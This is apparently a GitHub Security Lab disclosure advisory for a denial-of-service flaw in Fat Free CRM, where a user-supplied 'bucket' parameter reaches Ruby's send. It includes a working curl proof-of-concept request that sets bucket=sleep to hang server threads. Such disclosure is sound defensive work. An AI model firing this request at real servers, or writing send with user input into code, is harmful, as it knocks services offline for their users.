Coordinated Disclosure Timeline

Summary

A denial of service vulnerability existed in Fat Free CRM where an authenticated attacker could have prevented the web application from handling any requests.

Product

Fat Free CRM

Tested Version

Details

Issue: Remote Denial of Service (GHSL-2022-073)

An authenticated user can perform a remote Denial of Service attack against Fat Free CRM. Fat Free CRM exposes several Task update endpoints that pass params[:bucket] to the bucket_empty? method, which calls send with the user-controllable bucket parameter as argument. Ruby’s send method calls any private or public method on an object including methods defined on parent classes such as Object and BasicObject. The Kernel module is included by the class Object, so its methods are available in every Ruby object.

Most public information about this type of vulnerability mentions the Kernel methods exit and exit! as destructive examples to pass to the send method. However, in a Rails application this throws an exception and while it shuts the current request down, it doesn’t kill the server. We found out that the Kernel method sleep might be a better candidate to stop a Rails application from answering requests. Calling sleep without a duration parameter will make the current request thread sleep forever.

So, if a Rails application is started with a maximum of 5 threads (RAILS_MAX_THREADS=5) in combination with 2 Puma workers (WEB_CONCURRENCY=2) it will take 10 (2*5) requests to stop the Rails application from responding to any requests.

This vulnerability was found using a CodeQL query which identifies code injection.

Proof of concept

The following request sets the params[:bucket] to sleep, which the application will be evaluated as send("sleep"):

curl -i -s -k -X $'PUT' \
    -H $'Host: 127.0.0.1:3000' -H $'Content-Length: 14' -H $'X-CSRF-Token: [..]' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Connection: close' \
    -b $'_fat_free_crm_session=[..]' \
    --data-binary $'bucket=sleep' \
    $'http://127.0.0.1:3000/tasks/26/complete'

(Hint: replace the X-CSRF-Token header and the _fat_free_crm_session cookie with valid (authenticated) values)

Impact

This issue may lead to Denial of Service (DOS).

Resources

CVE

Credit

This issue was discovered and reported by GHSL team member @p- (Peter Stöckli).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-073 in any communication regarding this issue.